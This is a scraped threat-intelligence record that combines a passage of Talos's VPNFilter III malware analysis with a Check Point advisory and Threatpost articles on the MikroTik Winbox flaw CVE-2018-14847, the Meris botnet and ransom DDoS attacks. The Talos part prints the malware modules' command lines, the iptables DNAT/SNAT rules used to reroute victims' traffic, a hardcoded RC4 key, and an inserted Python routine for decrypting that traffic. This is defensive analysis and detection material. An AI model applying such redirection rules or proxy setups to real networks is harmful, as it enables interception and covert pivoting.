Typically, a rule like this would be useful as part of a man-in-the-middle attack enabling attackers with access to the devices to intercept forwarded traffic, manipulate it, then manually forward it. This might explain the list of CIDR ranges as a list of IPs to intercept. We were unable to locate any indication of this sort of functionality present within the samples that were analyzed. \n \nWe have concluded that the IPs are not used. This may be due to them being left over from an older version of the netfilter module, functionality that has not yet been implemented, or there may be modifications to the statically linked iptables library made by the malware authors that we haven't found yet. The VPNFilter authors have modified open-source code before (e.g. the ndbr module), so it's not unexpected that they would change the libiptc code linked in the netfilter module. \n \n\n\n### 'portforwarding' (Allows the forwarding of network traffic to attacker specified infrastructure)\n\n \nThe portforwarding module is designed to be executed with the following command line arguments: \n \n./portforwarding <unused> <unused> \"start <IP1> <PORT1> <IP2> <PORT2>\" \n \nGiven these arguments, the portforwarding module will forward traffic from a particular port and IP combination to another port and IP by installing the following iptables rules: \n \niptables -t nat -I PREROUTING 1 -p tcp -m tcp -d <IP1> --dport <PORT1> -j DNAT --to-destination <IP2>:<PORT2> \n \niptables -t nat -I POSTROUTING 1 -p tcp -m tcp -d <IP2> --dport <PORT2> -j SNAT --to-source <device IP> \n \nThese rules cause any traffic passing through the infected device that is destined to IP1:PORT1 to be redirected to IP2:PORT2 instead. The second rule then changes the source address of the rerouted traffic to that of the infected device to ensure the responses are sent back to the infected device. 
\n \nAs a precaution, before installing the iptables rules, the portforwarding module first checks that IP2 is available by creating a socket connection to IP2 on PORT2. However, no data is sent before the socket is closed. \n \nLike other modules that manipulate iptables, the portforwarding module enters a loop that adds the rules, waits a period of time, deletes the rules and then adds them again to ensure that the rules persist on the device even if they are manually deleted. \n \n\n\n### 'socks5proxy' (Enables establishment of a SOCKS5 proxy on compromised devices)\n\n \nThe socks5proxy module is a SOCKS5 proxy server that appears to be based on the open-source project [shadowsocks](<https://shadowsocks.org/en/index.html>). The server uses no authentication and is hardcoded to listen on TCP port 5380. Before the server is started, socks5proxy forks to connect to a C2 server specified in arguments supplied to the module. If the server does not respond within a few seconds, the fork kills its parent process (the server) and then exits. The C2 server can respond with commands to execute normally or terminate the server. 
\n \nThis module contains the following usage strings, though they do not line up with the arguments for the socks5proxy module, and these settings cannot be modified through command line arguments: \n \nssserver \n --username <username> username for auth \n --password <password> password for auth \n -p, --port <port> server port, default to 1080 \n -d run in daemon \n --loglevel <level> log levels: fatal, error, warning, info, debug, trace \n -h, --help help \n \nThe actual command line arguments for the socks5proxy module are: \n \n./socks5proxy <unused> <unused> \"start <C&C IP> <C&C port>\" \n \nThe socks5proxy module verifies the argument count is greater than 1, but the process crashes with a SIGSEGV signal if two arguments are given, indicating that there may be limited or poor quality control during some phases of development for this malware toolchain. \n \n\n\n### 'tcpvpn' (Enables establishment of a Reverse-TCP VPN on compromised devices)\n\n \nThe tcpvpn module is a Reverse-TCP VPN, designed to allow a remote attacker to access internal networks behind infected devices. It accomplishes this by beaconing to a remote server, which could be set up like a TunTap device to forward packets over the TCP connection. The connection is seen as outbound by network devices, which may help the module bypass simple firewalls or NAT issues. This module is similar in concept to penetration testing software Cobalt Strike's [VPN Pivoting](<https://www.cobaltstrike.com/help-covert-vpn>). \n \nAll data sent through the connection is encrypted with RC4, with a key generated from the hardcoded bytes: \n \n\"213B482A724B7C5F4D77532B45212D215E79433D794A54682E6B653A56796E457A2D7E3B3A2D513B6B515E775E2D7E533B51455A68365E6A67665F34527A7347\"\n \nThese bytes are sandwiched between the port numbers of the current connection (e.g., \"58586!;H*rK|_MwS+E!-!^yC=yJTh.ke:VynEz-~;:-Q;kQ^w^-~S;QEZh6^jgf_4RzsG80\"). 
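To make the described key construction concrete for anyone decrypting captured tcpvpn traffic in a lab, here is an added Python example (not Talos code and not the malware's own) that rebuilds the RC4 session key from the hardcoded bytes and the two port numbers, reproducing the sample key quoted above, and runs RC4 over a payload. It assumes the first port in the sample key is the client's ephemeral source port and the last is the C2 port; the sample payload is constructed.

```python
"""Rebuild the tcpvpn RC4 session key and decrypt a captured payload with it.

Assumption (matches the sample key "58586...G80" in the write-up): the key is
ASCII(src_port) + <hardcoded 64 bytes> + ASCII(dst_port).
"""

# Hardcoded key material quoted in the Talos write-up, hex encoded (64 bytes).
TCPVPN_KEY_HEX = (
    "213B482A724B7C5F4D77532B45212D215E79433D794A54682E6B653A56796E45"
    "7A2D7E3B3A2D513B6B515E775E2D7E533B51455A68365E6A67665F34527A7347"
)
TCPVPN_KEY_BYTES = bytes.fromhex(TCPVPN_KEY_HEX)


def derive_key(src_port: int, dst_port: int) -> bytes:
    """Sandwich the hardcoded bytes between the two port numbers (as ASCII)."""
    for port in (src_port, dst_port):
        if not 0 <= port <= 65535:
            raise ValueError(f"port out of range: {port}")
    return str(src_port).encode() + TCPVPN_KEY_BYTES + str(dst_port).encode()


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA). The same call both encrypts and decrypts."""
    if not key:
        raise ValueError("empty key")
    # Key-scheduling algorithm: permute S according to the key.
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    # Pseudo-random generation: XOR each input byte with the keystream.
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def decrypt_flow(src_port: int, dst_port: int, ciphertext: bytes) -> bytes:
    """Decrypt the TCP payload of one tcpvpn connection given its port pair."""
    return rc4(derive_key(src_port, dst_port), ciphertext)


if __name__ == "__main__":
    key = derive_key(58586, 80)
    print("session key:", key.decode())
    # Constructed sample: stand-in for a ciphertext blob carved from a pcap.
    captured = rc4(key, b"constructed tcpvpn payload")
    print("decrypted  :", decrypt_flow(58586, 80, captured))
```

Because RC4 is symmetric, the same routine recovers plaintext from a capture once the two port numbers are read off the TCP header.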
\n \nThe command line syntax associated with the tcpvpn module is: \n \n./tcpvpn <unused> <unused> \"start <C&C IP> <C&C port>\" \n \n\n\n### MikroTik Research\n\n \n\n\n### Introducing the Winbox Protocol Dissector\n\n \nDuring our research into VPNFilter, we needed to determine how some of the devices were compromised. While examining the MikroTik series of devices, we noticed an open port (TCP 8291) and that the configuration tool \"Winbox\" uses that port for communication. \n \nThe traffic from these devices appeared as large blobs of binary data, so we weren't able to determine potential avenues of access using this protocol without a protocol dissector (which, to our knowledge, didn't exist publicly). We decided to develop our own protocol dissector for use with packet analysis tools such as [Wireshark](<https://www.wireshark.org/>) to learn more about the protocol, which would allow us to design effective rules to prevent future infections once potential attack vectors were discovered. \n \nAn example of such an attack vector is [CVE-2018-14847](<https://arstechnica.com/information-technology/2018/09/unpatched-routers-being-used-to-build-vast-proxy-army-spy-on-networks/>) which allows an attacker to perform a directory traversal for unauthenticated credential recovery. The dissector proved extremely helpful when we wrote coverage for this vulnerability ([Snort SID: 47684](<https://www.snort.org/advisories/598>)). While an [update](<https://blog.mikrotik.com/security/winbox-vulnerability.html>) for this vulnerability has been released, we think it's essential for security professionals to be able to monitor this traffic to help identify any other potentially malicious traffic. \n \nPrivacy can still be maintained by ensuring that you either use \"secure mode\" to encrypt communications or download the latest Winbox client which communicates over encrypted channels only. This tool will **NOT** decrypt encrypted communications. 
The latest MikroTik CCR firmware version we tested (6.43.2) enforces the usage of this newer Winbox client, though this is only enforced client-side. This means that you **CAN** still communicate over insecure channels using a custom-made client. Therefore, we believe this Wireshark dissector remains useful because an attacker can still deliver an exploit without having to reimplement said secure communications. \n \n\n\n### What is the \"Winbox Protocol?\"\n\n \nThe term \"Winbox\" comes from the Winbox client offered by MikroTik as an alternative to the web GUI. \n \nFrom the official [documentation](<https://wiki.mikrotik.com/wiki/Manual:Winbox>), Winbox is a small utility that allows for the administration of MikroTik RouterOS using a fast and simple GUI. It is a native Win32 binary but can be run on Linux and MacOS (OSX) using Wine, an open-source compatibility layer. All Winbox interface functions are as close as possible to mirroring the console functions \u2014 that is why there are no Winbox sections in the manual. Some of the advanced and critical system configurations are not possible from Winbox, like changing the MAC address on an interface. \n \nThe term \"Winbox Protocol\" is not official, as far as we know. It's simply the term we chose since it matches the name of their client. \n \n\n\n### Using the dissector\n\n \nInstallation is simple, and since this is a Lua-based dissector, recompilation is not necessary. Simply drop the Winbox_Dissector.lua file into your /$HOME/.wireshark/plugins folder. By default, any TCP traffic to or from TCP port 8291 will be properly decoded as Winbox traffic once the dissector is installed. \n \nWhile a single message from the client/server to its destination would be preferable for parsing purposes, this is not always the case, and observing live communications proved that there are many ways that Winbox messages can be formatted and sent. 
\n \nBelow is an example of a Winbox communications capture that has the following properties: \n\n\n * Multiple messages sent in the same packet.\n * Messages containing one or more two-byte \"chunks\" that need to be removed before parsing.\n * Messages too long for a single packet \u2014 TCP reassembly applied.\n * Messages containing additional \"nested\" messages\nHere is how the capture is displayed before installing the dissector: \n\n\n[](<https://4.bp.blogspot.com/-Y6bIpGj74pc/W6uQlLqJpwI/AAAAAAAAAzo/lXw2AvRsQJ48OBPHe-ESqVEAO1fXOhUhgCLcBGAs/s1600/image1.png>)\n\nThe communications are correctly parsed in Wireshark following installation of the Winbox protocol dissector: \n\n\n[](<https://4.bp.blogspot.com/-koiAk2C71Kw/W6uQpoeyiOI/AAAAAAAAAzs/ug0oWJDeZdknnq-ZGhM1xP5epx2s7TWGACLcBGAs/s1600/image2.png>)\n\n### Obtaining the Dissector\n\n \nTo improve the security community's ability to analyze these communications and to monitor for threats that may attempt to take advantage of the Winbox Protocol, Cisco Talos is releasing this dissector for public use. For additional information and to obtain the dissector, please see the GitHub repository [here](<https://github.com/Cisco-Talos/Winbox_Protocol_Dissector>). \n \n\n\n## Conclusion\n\n \nAs a result of the capabilities we previously discovered in VPNFilter coupled with our new findings, we now confirm that VPNFilter provides attackers all of the functionality required to leverage compromised network and storage devices to further pivot into and attack systems within the network environments that are being targeted. \n \nIt also allows attackers to leverage their access to sensitive systems such as gateway and routing devices to perform activities such as network mapping and endpoint exploitation, network communications monitoring and traffic manipulation, among other serious threats. 
Another dangerous capability provided by VPNFilter is the ability to turn compromised devices into proxies that could be leveraged to obfuscate the source of future, unrelated attacks by making it appear as if the attacks originate from networks previously compromised by VPNFilter. The sophisticated nature of this framework further illustrates the advanced capabilities of the threat actors making use of it, as well as the need for organizations to deploy robust defensive architectures to combat threats such as VPNFilter. \n \nWith this new understanding of VPNFilter, most of our unanswered questions about the malware itself have now been answered. However, there are still significant unknowns about this threat that linger to this day: \n \n**How did the actor gain initial access to affected devices?** \n \nWhile we strongly assess that they utilized widely known, public vulnerabilities based on the makes/models affected by VPNFilter, we still don't have definitive proof of this. \n \n**Is the actor attempting to reconstitute their access?** \n \nBased on our telemetry and information from our partners, it appears that VPNFilter has been entirely neutralized since we and our international coalition of partners (law enforcement, intelligence organizations, and the [Cyber Threat Alliance](<https://www.cyberthreatalliance.org/>)) countered the threat earlier this year. Most C2 channels for the malware have been mitigated. The stage 2 implants were non-persistent, so most have likely been cleared from infected devices. We have seen no signs of the actor attempting to reconnect with devices that may still have the persistent stage 1 with an open listener. \n \nDoes this mean the actor has abandoned this expansive foothold into the small and home office (SOHO) network device space? Are they instead reconstituting their access by starting over, re-exploiting and dropping new unknown malware? 
Have they given up on having broad worldwide SOHO access in favor of a more tailored approach only going after specific key targets? \n \nWhatever the answers may be, we know that the actor behind VPNFilter is extremely capable and driven by their mission priorities to continually maneuver to achieve their goals. In one form or another, they continue to develop and use the tools and frameworks necessary to achieve their mission objective(s). \n \n\n\n## IOCs\n\n \n\n\n## Coverage\n\n \nThe following new coverage has been developed to detect additional modules used by VPNFilter. \n 
\n**New Snort for ndbr:** \n \nsid:1:47377:1 \n \n**New Clam AV:** \n \nUnix.Trojan.Vpnfilter_htpx-6596262-0 \nUnix.Trojan.Vpnfilter_ndbr-6598711-0 \nUnix.Trojan.Vpnfilter_netfilter-6599563-0 \nUnix.Trojan.Vpnfilter_nm-6598714-0 \nUnix.Trojan.Vpnfilter_portforwarding-6599587-0 \nUnix.Trojan.Vpnfilter_socks5proxy-6599614-0 \nUnix.Trojan.Vpnfilter_tcpvpn-6606298-0 \n \n**Updated Clam AV:** \n \nThe following ClamAV signatures were updated to improve detection of additional Stage 1 and Stage 2 modules used by VPNFilter: \n \nUnix.Trojan.Vpnfilter-6425812-1 \nUnix.Trojan.Vpnfilter-6550592-1 \n \n\n\n", "cvss3": {}, "published": "2018-09-26T07:59:00", "type": "talosblog", "title": "VPNFilter III: More Tools for the Swiss Army Knife of Malware", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2018-14847"], "modified": "2018-09-26T19:31:00", "id": "TALOSBLOG:744C774279644C0E2B83FB09F7352468", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/2MO3kUK13Q8/vpnfilter-part-3.html", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "checkpoint_advisories": [{"lastseen": "2021-12-17T11:26:37", "description": "An authentication bypass vulnerability exists in the Winbox component of Mikrotik RouterOS. A remote attacker could exploit this flaw by sending specially crafted packets to the affected server. 
Successful exploitation of this vulnerability would allow a remote attacker to hijack a user's session and escalate their access.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 9.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.2}, "published": "2018-08-06T00:00:00", "type": "checkpoint_advisories", "title": "MikroTik RouterOS Winbox Authentication Bypass (CVE-2018-14847)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-14847"], "modified": "2018-08-21T00:00:00", "id": "CPAI-2018-0830", "href": "", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}], "threatpost": [{"lastseen": "2021-09-13T14:38:34", "description": "Technical details tied to a record-breaking distributed-denial-of-service (DDoS) attack against Russian internet behemoth Yandex are surfacing as the digital dust settles. A massive botnet, dubbed M\u0113ris, is believed responsible, flooding Yandex with millions of HTTP requests for webpages at the same time.\n\nThis DDoS technique is called HTTP pipelining, where a browser requests a connection to a server and, without waiting for a response, sends multiple more requests. 
Those requests reportedly originated from networking gear made by MikroTik. Attackers, according to Qrator Labs, exploited a 2018 bug left unpatched in more than 56,000 MikroTik hosts involved in the DDoS attack.\n\nAccording to Qrator, the M\u0113ris botnet delivered the largest attack against Yandex it has ever spotted (by traffic volume) \u2013 peaking at 21.8 million requests per second (RPS). By comparison, infrastructure and website security firm Cloudflare reported that the \u201c[largest ever](<https://blog.cloudflare.com/cloudflare-thwarts-17-2m-rps-ddos-attack-the-largest-ever-reported/>)\u201d DDoS attack occurred on August 19, with 17.2 million RPS.\n\n## The Looming M\u0113ris Monster\n\nResearchers have linked M\u0113ris to the August 19 DDoS attack tracked by Cloudflare. The Yandex attacks occurred between August 29 and September 5 \u2013 when the 21.8 million RPS attack occurred. Both are believed to be smaller precursor attacks by threat actors behind the M\u0113ris botnet, which have yet to utilize the enormous firepower. \n\n\u201cYandex\u2019 security team members managed to establish a clear view of the botnet\u2019s internal structure. L2TP [Layer 2 Tunneling Protocol] tunnels are used for internetwork communications. The number of infected devices, according to the botnet internals we\u2019ve seen, reaches 250,000,\u201d [wrote Qrator in a Thursday blog post](<https://blog.qrator.net/en/meris-botnet-climbing-to-the-record_142/>).\n\nL2TP is a protocol used to manage virtual private networks and deliver internet services. 
Tunneling facilitates the transfer of data between two private networks across the public internet.\n\nYandex and Qrator launched an investigation into the attack and believe M\u0113ris to be highly sophisticated.\n\n\u201cMoreover, all those [compromised MikroTik hosts are] highly capable devices, not your typical IoT blinker connected to Wi-Fi \u2013 here we speak of a botnet consisting of, with the highest probability, devices connected through the Ethernet connection \u2013 network devices, primarily,\u201d researchers wrote.\n\n## Early Warnings Ignored?\n\nThe technical attack specifics include the exploitation of a 2018 vulnerability, tracked as [CVE-2018-14847](<https://threatpost.com/poc-attack-escalates-mikrotik-router-bug-to-as-bad-as-it-gets/138076/>). Tenable Research [warned at the time](<https://threatpost.com/poc-attack-escalates-mikrotik-router-bug-to-as-bad-as-it-gets/138076/>) of its disclosure that the bug needed to be taken extremely seriously, because a newly found hack technique allowed for remote code execution on MikroTik edge and consumer routers.\n\n\u201cWe are now able to show how an attacker can use it to get root shell on a system. It uses CVE-2018-14847 to leak the admin credentials first and then an authenticated code path gives us a back door,\u201d Tenable told Threatpost in 2018.\n\nWhile MikroTik patched CVE-2018-14847 back then, Tenable has now revealed that only approximately 30 percent of vulnerable modems have been patched, which leaves approximately 200,000 routers vulnerable to attack. MikroTik\u2019s RouterOS powers its business-grade RouterBOARD brand, as well as ISP/carrier-grade gear from the vendor.\n\nQrator\u2019s recent analysis of the DDoS attack revealed that the compromised hosts each had open ports 2000 (Bandwidth test server) and 5678 (Mikrotik Neighbor Discovery Protocol). 
Researchers reported 328,723 active hosts on the internet replying to the TCP probe on port 5678.\n\n## Mitigating a Monster\n\nWhile patching MikroTik devices is the ideal mitigation to combat future M\u0113ris attacks, researchers also recommended blacklisting.\n\n\u201cSince those [M\u0113ris] attacks are not spoofed, every victim sees the attack origin as it is. Blocking it for a while should be enough to thwart the attack and not disturb the possible end user,\u201d wrote researchers.\n\n\u201c[It\u2019s] unclear how the\u2026owners for the M\u0113ris botnet would act in the future \u2013 they could be taking advantage of the compromised devices, taking 100 percent of its capacity (both bandwidth and processor-wise) into their hands. In this case, there is no other way other than blocking every consecutive request after the first one, preventing answering the pipelined requests.\u201d\n\n
", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 9.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.2}, "published": "2021-09-10T16:31:14", "type": "threatpost", "title": "Yandex Pummeled by Potent Meris DDoS Botnet", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-14847"], "modified": "2021-09-10T16:31:14", "id": "THREATPOST:2E5940B4290E375F15EAA2246BBD6EFF", "href": "https://threatpost.com/yandex-meris-botnet/169368/", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2019-09-05T08:21:36", "description": "A full 7,500+ MikroTik routers are forwarding their owners\u2019 traffic to eavesdropping cybercriminals \u2013 while 239,000 more have had their Socks4 proxy enabled, maliciously and surreptitiously. 
This means the bad actors can gain access to any of the files or data being passed by the router to and from corporate networks.\n\nAccording to security researchers at 360 Netlab, adversaries are exploiting the known MikroTik [CVE-2018-14847](<https://n0p.me/winbox-bug-dissection/>) vulnerability in Winbox, which is a management component and a Windows GUI application for MikroTik\u2019s RouterOS software. RouterOS powers the business-grade RouterBOARD brand, as well as ISP/carrier-grade gear from the vendor.\n\nThe flaw is a Winbox any-directory file-read issue that allows bad actors to read files that flow through the router without authentication; while MikroTik patched it in early August, many users have yet to update, leaving a large attack surface open.\n\nIn fact, as of August 24, the 360 Netlab honeypot network had picked up on more than 5 million devices with an open TCP/8291 port worldwide, of which 1.2 million are MikroTik devices. Out of those, about 31 percent, or 370,000, are vulnerable to the flaw.\n\n\u201cThe MikroTik RouterOS device allows users to capture packets on the router and forward the captured network traffic to the specified Stream server,\u201d the researchers explained, in [a post](<https://blog.netlab.360.com/7500-mikrotik-routers-are-forwarding-owners-traffic-to-the-attackers-how-is-yours-en/>) on Tuesday, adding that attackers are listening to ports 20, 21, 25, 110 and 143, corresponding to FTP-data, FTP, SMTP, POP3 and IMAP traffic. Also, oddly, SNMP ports 161 and 162 are under surveillance.\n\n\u201cThis deserves some questions,\u201d the researchers pointed out. \u201cWhy are the attackers paying attention to the network management protocol regular users barely use? Are they trying to monitor and capture some special users\u2019 network snmp community strings? 
We don\u2019t have an answer at this point, but we would be very interested to know what the answer might be.\u201d\n\nMost of the 7,500 victims are in Russia, the firm found; and in terms of the collecting IP addresses, 37.1.207.114 is the top player among all the attackers.\n\n\u201cWe must note these are carrier-grade routers that have been compromised,\u201d [Troy Mursch](<https://twitter.com/bad_packets>), researcher at Bad Packets Report, told Threatpost. \u201cBecause of this, the amount of information (data) passing through them is far greater than some simple SOHO router. This also means they may be routing traffic for a government organization, corporation or any other large enterprise. Snooping file transfers (FTP), email (SMTP/POP3/IMAP), and even SNMP traffic can yield a wealth of information about the targeted organization. This information can in turn be used against them to further compromise and/or surveil their network. Hackers can also sell this data to third-parties for malicious purposes, as we find numerous Dark Web shops peddling this kind of stuff.\u201d\n\nAs for the Socks4 proxy enablement, researchers found that a single malicious actor is behind that campaign \u2013 and that the motive remains to be seen.\n\n\u201cThe Socks4 port is mostly TCP/4153, and very interestingly, the Socks4 proxy config only allows access from one single net-block 95.154.216.128/25,\u201d the researchers explained. 
\u201cIn order for the attacker to gain control even after device reboot ([an] IP [address] change), the device is configured to run a scheduled task to periodically report its latest IP address by accessing a specific attacker\u2019s URL.\u201d\n\nThe attacker also uses compromised Socks4 proxies to scan more MikroTik RouterOS devices for vulnerabilities.\n\n\u201cIt is hard to say what the attacker is up to with these many Sock4 proxies, but we think this is something significant,\u201d the researchers added.\n\nMursch told us, \u201cAs Netlab360 notes in one example, the proxy was used to scan for additional MikroTik routers to compromise without revealing the hacker\u2019s real IP address. The proxy access can also be sold/given to other miscreants for any/all other malicious purposes.\u201d\n\nThe situation is once again a [wake-up call to patching](<https://threatpost.com/threatlist-financial-services-firms-lag-in-patching-habits/134750/>). MikroTik RouterOS users should update their software, and check whether the HTTP proxy, Socks4 proxy or network traffic-capture function are being maliciously exploited.\n\nA similar situation arose in August when [tens of thousands of MikroTik routers](<https://threatpost.com/huge-cryptomining-attack-on-isp-grade-routers-spreads-globally/134667/>) were found to have been compromised, with the actors embedding the Coinhive cryptomining scripts into websites using a known vulnerability.\n\n\u201cThis [latest] report clearly shows that scraping for pennies with Coinhive is not the worst-case scenario that miscreants can do with these compromised MikroTik routers,\u201d Mursch told Threatpost.\n", "cvss3": {}, "published": "2018-09-04T18:34:10", "type": "threatpost", "title": "Thousands of MikroTik Routers Hijacked for Eavesdropping", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-14847", "CVE-2019-12643"], "modified": "2018-09-04T18:34:10", "id": "THREATPOST:29B457A3AC4B513C7DA2C181E899EBBF", "href": 
"https://threatpost.com/thousands-of-mikrotik-routers-hijacked-for-eavesdropping/137165/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-04T22:51:44", "description": "Hey webop_geeks, you_are_already_dead, a note claiming to be left by the REvil ransomware gang declared, embedded into the attack itself as a string of text in the URL for the extortion demand.\n\nImperva reported the interesting twist on Friday \u2013 one of several it\u2019s seen in the evolution of distributed denial-of-service (DDoS) attacks so far this year.\n\nIn a [post](<https://www.imperva.com/blog/imperva-mitigates-ransom-ddos-attack-measuring-2-5-million-requests-per-second/>) that detailed mitigation of a recent attack that hit up to 2.5 Mrps (millions of requests per second) on a single website, Imperva\u2019s Nelli Klepfish shared several chest-thumping ransom notes \u2013 a screen capture of one is included below \u2013 that its targeted customer received before the attack started.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/04144634/DDoS-Attack-March-Image-2_png-e1646423206575.jpg>)\n\nA ransom note embedded into the attack\u2019s URL extortion demand. Source: Imperva.\n\n\u201cWe are observing more cases like this where the ransom note has been included as part of the attack itself, perhaps as a reminder to the target to send their bitcoin payment,\u201d Klepfish wrote. \u201cOf course, once the target receives this note, the attack is already underway, adding a sense of urgency to the threat.\u201d\n\nThis was only one of several threatening ransom notes the target received before the 2.5 Mrps DDoS attack began, and the specific message shown above was one of more than 12 million embedded requests that targeted random pages on the same site.\n\nThe 2.5 Mrps attack was the highest pitter-patter Imperva\u2019s ever wrangled, but it\u2019s nowhere near the highest ever. 
That undesirable trophy likely goes to the 2.5 Tbps DDoS that [hit Google](<https://cloud.google.com/blog/products/identity-security/identifying-and-protecting-against-the-largest-ddos-attacks>) in September 2017, sending 167 Mps to 180,000 exposed CLDAP, DNS, and SNMP servers that turned around and sent back big, choke-you packets.\n\n\u201cWhile ransom DDoS attacks are not new, they appear to be evolving and becoming more interesting with time and with each new phase,\u201d Imperva observed.\n\nAnother threatening message, shown below, told \u201cwebops_geeks\u201d to inform their bosses that they\u2019d need to start coughing up 1 Bitcoin a day \u2013 worth the tidy sum of about USD $40K, as of Friday \u2013 if they wanted to stay online. It, and other embedded messages, were signed \u201crevil_this_is_our_dominion.\u201d\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/04151615/DDoS-Attack-March-Image-3_png-e1646424987225.jpg>)\n\nAnother message incorporated into one of the targeted URLs. Source: Imperva.\n\nWhether or not the attacks have anything to do with the REvil ransomware-as-a-service (RaaS) [gang](<https://threatpost.com/how-revil-may-have-ripped-off-its-own-affiliates/174887/>) or are just coming from an imposter is anybody\u2019s guess. Russia made a show of [busting up](<https://threatpost.com/russian-security-revil-ransomware/177660/>) REvil in January, with its Federal Security Service (FSB) claiming to have raided gang hideouts; seized currency, cars and personnel; and neutralized REvil\u2019s infrastructure at the request of the United States. But as these things go, cybercrook gangs are like blobs of jelly: You squeeze one end, and the action pops up somewhere else as members join other cybercriminal gangs.\n\nREvil does have a history of DDoS ransomware, though. 
In October 2021, a British voice-over-IP (VoIP) firm \u2013 Voice Unlimited \u2013 was still [recuperating](<https://www.theregister.com/2021/10/08/voip_unlimited_limited_by_outage/>) a month after a series [of apparent sustained DDoS](<https://status.voip-unlimited.net/>) attacks that were attributed to REvil.\n\n## Threatening to Tank Victim\u2019s Stocks\n\nThe next day, the attackers sent over 15 million requests to the same site, this time with a new message that warned the CEO that the attackers would eviscerate the company\u2019s stock price by \u201chundreds_of_millions_in_market_cap.\u201d\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/04173034/stock_price-e1646433046983.jpg>)\n\nMessage threatening the stock price. Source: Imperva.\n\nThe attacks kept coming for several days, lasting up to several hours and, in 20 percent of cases, hitting between 90 and 750 thousand requests per second (Krps).\n\n## Born of the Brawny Meris Botnet\n\nEvidence points to the DDoS attacks coming from the massive Meris botnet. Meris sucks its power out of the thousands of internet-of-things (IoT) devices that have been hijacked thanks to a years-old [vulnerability](<https://threatpost.com/poc-attack-escalates-mikrotik-router-bug-to-as-bad-as-it-gets/138076/>), tracked as CVE-2018-14847, in MikroTik routers.\n\n\u201cAlthough CVE-2018-14847 was published a while ago, attackers can still take advantage of it,\u201d Imperva pointed out.\n\nAnd how. The Meris botnet was behind the record-breaking DDoS attack that [targeted](<https://threatpost.com/yandex-meris-botnet/169368/>) Russia\u2019s version of Google \u2013 Yandex \u2013 in September 2021. 
Other targets for Meris in 2021 included cybersecurity media sites Krebs on Security and Infosecurity, as well as New Zealand banks, its post mail service and the country\u2019s MetService weather service.\n\nThey\u2019re all cases in point for the fact that DDoS attacks [shattered records](<https://threatpost.com/ddos-attacks-records-q3/176082/>) in Q3.\n\nWhile the largest attack to hit Imperva\u2019s customer reached 2.5 Mrps, the company blocked over 64 million requests in under one minute, as shown in the graph below:\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/04165034/Imperva_graph-e1646430646948.jpg>)\n\nGraph showing over 64 million requests blocked in under one minute. Source: Imperva.\n\nThe top originating countries were Indonesia and the United States, as shown in the pie chart below. \u201cWe have seen a pattern emerging of almost identical source locations for different attacks, indicating that the same botnet was used many times,\u201d Imperva said.\n\nThe attacks took only seconds to mitigate, given that the sources, which impersonated legitimate browsers or a Google bot, were known to be malicious.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/04165505/Top_countries-e1646430917193.jpg>)\n\nTop originating countries. Source: Imperva.\n\nThe threat actors focused on business sales and communications sites, mainly based in the United States or Europe, that had the commonality of being exchange-listed. 
